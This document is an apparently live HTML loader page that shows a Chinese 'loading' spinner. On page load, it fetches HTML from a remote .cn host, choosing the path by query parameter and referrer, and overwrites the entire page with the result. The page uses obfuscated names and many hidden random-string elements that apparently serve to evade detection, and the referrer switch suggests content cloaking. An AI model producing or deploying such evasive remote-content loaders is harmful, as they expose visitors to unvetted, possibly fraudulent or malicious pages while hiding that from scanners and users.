<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Lnu1nAQd {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Lnu1nAQd .zmdRydtuClk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Lnu1nAQd .content {
            line-height: 50px;
            text-align: center
        }

        .Lnu1nAQd .img {
            width: 100%
        }

        .Lnu1nAQd .dC7cvVW6SjL {
            text-align: center
        }

        .Lnu1nAQd .dC7cvVW6SjL span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Lnu1nAQd .dC7cvVW6SjL span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Lnu1nAQd .dC7cvVW6SjL span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Lnu1nAQd .dC7cvVW6SjL span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Lnu1nAQd .dC7cvVW6SjL span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Lnu1nAQd .dC7cvVW6SjL span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Lnu1nAQd .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ASUeXmiLhnBH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var m0IiKX = ASUeXmiLhnBH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ m0IiKX +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ m0IiKX +".html?a=share";
		}
		
        ecZ0P8MCfT=url+"#"+new Date().getTime();
        ecZ0P8MCfT && function() {
            $.get(ecZ0P8MCfT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >VHNv6TTiDebazZ3JPbjDvN4msI4gK6NuKYoXHuFWMWJVZD2VdL9JOrI7axEIbqhrXHN8q</ul>
<a  href='#' style='display:none'>btSxlOVPOYZ9qAdEeemqpr8zU3RV6UMCPHsEvnp5yFZUhZbg1slmeO1ev51GBA4BYF1dm2bpPG7</a>
<ul style='display:none' >VHNv6TTiDebazZ3JPbjDvN4msI4gK6NuKYoXHuFWMWJVZD2VdL9JOrI7axEIbqhrXHN8q</ul>
<img  src='' style='display:none'><div class="Lnu1nAQd">
    <div class="zmdRydtuClk">
        <div class="dC7cvVW6SjL">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>wKPbcGmzjFBnc0ObNcIPqU5HwMcPfwRYjIlubRHuzeUHPtA</a>
<ul style='display:none' >vwDNwPmkLj3lK2fKiz7Z9PTyzlrX4sUUPNSIE0D4qWwUFuvUDB8rSWTFddWBd4gH</ul>
<h1 style='display:none' >q6xqHsDsDExJpILogwzHQPX7iWuBLUVTOt769PCOkMg1SfGvayBXGPo1</h1>
<li style='display:none' >A1ErVmQOkolCpujRL5bXB9LNoCfihsW1JN1PrONzJK0</li>
<span style='display:none'>JsdGY1BNiOniNR0bfgZAluVBUE335Ef</span>
<a  href='#' style='display:none'>wKPbcGmzjFBnc0ObNcIPqU5HwMcPfwRYjIlubRHuzeUHPtA</a>
<p  style='display:none'>VobkSkUXKbHDVNvSTSz9Aj34igBcWcaJZ67lRmFWI4dIHQ4prl0BjflMVTatqUCkxs</p>
<div style='display:none'>s6QhbhI9iSBSswHcVkwlC0B</div>
<img  src='' style='display:none'>
<li style='display:none' >A1ErVmQOkolCpujRL5bXB9LNoCfihsW1JN1PrONzJK0</li></body>
</html>